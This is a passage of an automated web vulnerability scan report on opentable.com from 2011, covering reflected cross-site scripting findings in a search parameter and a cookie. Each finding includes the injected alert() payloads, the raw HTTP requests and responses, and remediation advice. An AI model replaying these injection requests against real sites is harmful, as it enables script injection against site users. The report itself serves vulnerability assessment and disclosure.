Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=6&vbefreg=6&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2fe644';alert(1)//a056217db90&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...

3.16. http://www.opentable.com/restaurant-search.aspx [ResTime parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the ResTime request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78f59'%3balert(1)//1463aa4e794 was submitted in the ResTime parameter. This input was echoed as 78f59';alert(1)//1463aa4e794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM78f59'%3balert(1)//1463aa4e794&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:47 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a47; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=19&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM78f59';alert(1)//1463aa4e794&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...

3.17. http://www.opentable.com/interim.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb1e9"-alert(1)-"a4ba175ba10 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestrefcb1e9"-alert(1)-"a4ba175ba10";
//-->
...[SNIP]...

3.18. http://www.opentable.com/interim.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29da"><script>alert(1)</script>aab47995e43 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
